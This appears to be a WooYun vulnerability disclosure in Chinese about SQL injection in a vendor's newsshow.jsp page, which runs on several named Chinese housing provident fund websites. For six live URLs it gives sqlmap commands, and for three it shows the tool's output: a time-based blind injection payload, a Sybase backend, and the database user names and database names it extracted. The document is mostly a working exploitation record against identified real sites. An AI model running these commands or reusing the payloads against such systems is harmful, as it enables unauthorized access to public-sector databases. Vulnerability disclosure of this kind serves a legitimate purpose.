WooYun.org

涉及厂家：北京安泰伟奥信息技术有限公司
影响范围可以参照其官网的典型客户名单http://www.atwasoft.com/p/views/customer.html
注入点：id
存在SQL注入的URL如下：
1、hzsgjj.com/Website/newsshow.jsp?id=125
sqlmap.py -u "hzsgjj.com/Website/newsshow.jsp?id=125" -p "id" --dbs --current-user --current-db

2、http://www.xngjj.gov.cn/Website/newsshow.jsp?id=535
sqlmap.py -u "http://www.xngjj.gov.cn/Website/newsshow.jsp?id=535" -p "id" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 104 HTTP(s) req
uests:
---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=535 WAITFOR DELAY '0:0:5'--
---
[22:36:39] [INFO] testing MySQL
[22:36:39] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[22:36:40] [WARNING] the back-end DBMS is not MySQL
[22:36:40] [INFO] testing Oracle
[22:36:40] [WARNING] the back-end DBMS is not Oracle
[22:36:40] [INFO] testing PostgreSQL
[22:36:40] [WARNING] the back-end DBMS is not PostgreSQL
[22:36:40] [INFO] testing Microsoft SQL Server
[22:36:41] [WARNING] the back-end DBMS is not Microsoft SQL Server
[22:36:41] [INFO] testing SQLite
[22:36:41] [WARNING] the back-end DBMS is not SQLite
[22:36:41] [INFO] testing Microsoft Access
[22:36:42] [WARNING] the back-end DBMS is not Microsoft Access
[22:36:42] [INFO] testing Firebird
[22:36:42] [WARNING] the back-end DBMS is not Firebird
[22:36:42] [INFO] testing SAP MaxDB
[22:36:42] [WARNING] the back-end DBMS is not SAP MaxDB
[22:36:42] [INFO] testing Sybase
[22:36:48] [INFO] confirming Sybase
[22:36:53] [INFO] the back-end DBMS is Sybase
web application technology: JSP
back-end DBMS: Sybase
[22:36:53] [INFO] fetching current user
[22:36:53] [INFO] retrieved:
[22:36:59] [INFO] adjusting time delay to 2 seconds due to good response times
jtpsoftadmin
current user: 'jtpsoftadmin'
[22:39:25] [INFO] fetching current database
[22:39:25] [INFO] retrieved: web
current database: 'web'
[22:40:02] [INFO] fetching database names
[22:40:02] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 249 times
Traceback (most recent call last):
File "thirdparty\ansistrm\ansistrm.pyo", line 50, in emit
File "lib\core\convert.pyo", line 120, in stdoutencode
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc5 in position 560: ordina
l not in range(128)
Logged from file _sqlmap.pyo, line 101
Traceback (most recent call last):
File "_sqlmap.pyo", line 72, in main
File "lib\controller\controller.pyo", line 570, in start
File "lib\controller\action.pyo", line 89, in action
File "plugins\dbms\sybase\enumeration.pyo", line 98, in getDbs
AttributeError: SybaseMap instance has no attribute '_Enumeration__pivotDumpTabl
e'
3、http://www.tygjj.com/Website/newsshow.jsp?id=1499
sqlmap.py -u "http://www.tygjj.com/Website/newsshow.jsp?id=1499" -p "id" --dbs --current-user --current-db

4、http://www.sysgjj.com/Website/newsshow.jsp?id=713
sqlmap.py -u "http://www.sysgjj.com/Website/newsshow.jsp?id=713" -p "id" --dbs --current-user --current-db

5、http://www.fcggjj.com/Website/newsshow.jsp?id=50
sqlmap.py -u "http://www.fcggjj.com/Website/newsshow.jsp?id=50" -p "id" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 104 HTTP(s) req
uests:
---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=50 WAITFOR DELAY '0:0:5'--
---
[22:49:51] [INFO] testing MySQL
[22:49:51] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[22:49:55] [WARNING] the back-end DBMS is not MySQL
[22:49:55] [INFO] testing Oracle
[22:50:00] [WARNING] the back-end DBMS is not Oracle
[22:50:00] [INFO] testing PostgreSQL
[22:50:05] [WARNING] the back-end DBMS is not PostgreSQL
[22:50:05] [INFO] testing Microsoft SQL Server
[22:50:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
[22:50:11] [INFO] testing SQLite
[22:50:16] [WARNING] the back-end DBMS is not SQLite
[22:50:16] [INFO] testing Microsoft Access
[22:50:21] [WARNING] the back-end DBMS is not Microsoft Access
[22:50:21] [INFO] testing Firebird
[22:50:26] [WARNING] the back-end DBMS is not Firebird
[22:50:26] [INFO] testing SAP MaxDB
[22:50:31] [WARNING] the back-end DBMS is not SAP MaxDB
[22:50:31] [INFO] testing Sybase
[22:50:46] [INFO] confirming Sybase
[22:51:02] [INFO] the back-end DBMS is Sybase
web application technology: JSP
back-end DBMS: Sybase
[22:51:02] [INFO] fetching current user
[22:51:02] [INFO] retrieved:
[22:51:17] [INFO] adjusting time delay to 3 seconds due to good response timesjtpsoftadmin
current user: 'jtpsoftadmin'
[23:05:22] [INFO] fetching current database
[23:05:22] [INFO] retrieved: wz
current database: 'wz'
[23:08:25] [INFO] fetching database names
[23:08:25] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 241 times
Traceback (most recent call last):
File "thirdparty\ansistrm\ansistrm.pyo", line 50, in emit
File "lib\core\convert.pyo", line 120, in stdoutencode
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc5 in position 560: ordinal not in range(128)
Logged from file _sqlmap.pyo, line 101
Traceback (most recent call last):
File "_sqlmap.pyo", line 72, in main
File "lib\controller\controller.pyo", line 570, in start
File "lib\controller\action.pyo", line 89, in action
File "plugins\dbms\sybase\enumeration.pyo", line 98, in getDbs
AttributeError: SybaseMap instance has no attribute '_Enumeration__pivotDumpTable'
6、http://www.lbszfgjj.org/Website/newsshow.jsp?id=31
sqlmap.py -u "http://www.lbszfgjj.org/Website/newsshow.jsp?id=31" -p "id" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 104 HTTP(s) req
uests:
---
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=31 WAITFOR DELAY '0:0:5'--
---
[07:36:19] [INFO] testing MySQL
[07:36:19] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[07:36:24] [WARNING] the back-end DBMS is not MySQL
[07:36:24] [INFO] testing Oracle
[07:36:29] [WARNING] the back-end DBMS is not Oracle
[07:36:29] [INFO] testing PostgreSQL
[07:36:33] [WARNING] the back-end DBMS is not PostgreSQL
[07:36:33] [INFO] testing Microsoft SQL Server
[07:36:38] [WARNING] the back-end DBMS is not Microsoft SQL Server
[07:36:38] [INFO] testing SQLite
[07:36:43] [WARNING] the back-end DBMS is not SQLite
[07:36:43] [INFO] testing Microsoft Access
[07:36:48] [WARNING] the back-end DBMS is not Microsoft Access
[07:36:48] [INFO] testing Firebird
[07:36:53] [WARNING] the back-end DBMS is not Firebird
[07:36:53] [INFO] testing SAP MaxDB
[07:36:57] [WARNING] the back-end DBMS is not SAP MaxDB
[07:36:57] [INFO] testing Sybase
[07:37:07] [INFO] confirming Sybase
[07:37:17] [INFO] the back-end DBMS is Sybase
web application technology: JSP
back-end DBMS: Sybase
[07:37:17] [INFO] fetching current user
[07:37:17] [INFO] retrieved:
[07:37:27] [INFO] adjusting time delay to 4 seconds due to good response times
[07:38:08] [INFO] adjusting time delay to 3 seconds due to good response times
[07:38:14] [ERROR] invalid character detected. retrying..
[07:38:14] [WARNING] increasing time delay to 4 seconds
jtpadmin
current user: 'jtpadmin'
[07:46:14] [INFO] fetching current database
[07:46:14] [INFO] retrieved: gjjweb
current database: 'gjjweb'
[07:52:14] [INFO] fetching database names
[07:52:14] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 249 times
Traceback (most recent call last):
File "thirdparty\ansistrm\ansistrm.pyo", line 50, in emit
File "lib\core\convert.pyo", line 120, in stdoutencode
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc5 in position 560: ordina
l not in range(128)
Logged from file _sqlmap.pyo, line 101
Traceback (most recent call last):
File "_sqlmap.pyo", line 72, in main
File "lib\controller\controller.pyo", line 570, in start
File "lib\controller\action.pyo", line 89, in action
File "plugins\dbms\sybase\enumeration.pyo", line 98, in getDbs
AttributeError: SybaseMap instance has no attribute '_Enumeration__pivotDumpTabl
e'